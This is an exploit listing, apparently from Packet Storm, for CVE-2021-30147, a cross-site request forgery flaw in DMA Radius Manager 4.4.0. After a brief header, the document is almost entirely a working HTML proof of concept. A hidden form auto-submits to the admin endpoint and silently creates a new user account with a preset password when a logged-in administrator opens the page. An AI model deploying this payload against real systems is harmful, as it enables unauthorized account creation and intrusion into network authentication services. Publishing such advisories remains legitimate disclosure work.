DMA Radius Manager version 4.4.0 suffers from a cross site request forgery vulnerability.
25570c0aa698b906c3b618a0ca6984fc513a5ae0f965072e74f4f0817fc6e33f# Exploit Title: DMA Radius Manager 4.4.0 - Cross-Site Request Forgery (CSRF)
# Date: April 8, 2021 (04/08/2021)
# Exploit Author: Issac Briones
# Vendor Homepage: http://www.dmasoftlab.com/
# Software Download: https://sourceforge.net/projects/radiusmanager/
# Version: 4.4.0
# CVE: CVE-2021-30147
<html>
<body>
< ! -- Change IP addr to IP addr that RADIUS manager is located -- >
<form action="http://192.168.1.2/admin.php?cont=store_user" method="POST">
<input type="hidden" name="username" value="csrf_usr" />
<input type="hidden" name="enableuser" value="1" />
<input type="hidden" name="acctype" value="0" />
<input type="hidden" name="password1" value="csrfusr" />
<input type="hidden" name="password2" value="csrfusr" />
<input type="hidden" name="maccm" value="" />
<input type="hidden" name="mac" value="" />
<input type="hidden" name="ipmodecpe" value="0" />
<input type="hidden" name="simuse" value="1" />
<input type="hidden" name="firstname" value="" />
<input type="hidden" name="lastname" value="" />
<input type="hidden" name="company" value="" />
<input type="hidden" name="address" value="" />
<input type="hidden" name="city" value="" />
<input type="hidden" name="zip" value="" />
<input type="hidden" name="country" value="" />
<input type="hidden" name="state" value="" />
<input type="hidden" name="phone" value="" />
<input type="hidden" name="mobile" value="" />
<input type="hidden" name="email" value="" />
<input type="hidden" name="taxid" value="" />
<input type="hidden" name="srvid" value="0" />
<input type="hidden" name="downlimit" value="0" />
<input type="hidden" name="uplimit" value="0" />
<input type="hidden" name="comblimit" value="0" />
<input type="hidden" name="expiration" value="2021-04-06" />
<input type="hidden" name="uptimelimit" value="00:00:00" />
<input type="hidden" name="credits" value="0.00" />
<input type="hidden" name="contractid" value="" />
<input type="hidden" name="contractvalid" value="" />
<input type="hidden" name="gpslat" value="" />
<input type="hidden" name="gpslong" value="" />
<input type="hidden" name="comment" value="" />
<input type="hidden" name="superuser" value="{SUPERUSER}" />
<input type="hidden" name="lang" value="English" />
<input type="hidden" name="groupid" value="1" />
<input type="hidden" name="custattr" value="" />
<input type="hidden" name="cnic" value="" />
<input type="hidden" name="cnicfile1" value="(binary)" />
<input type="hidden" name="cnicfile2" value="(binary)" />
<input type="hidden" name="adduser" value="Add user" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed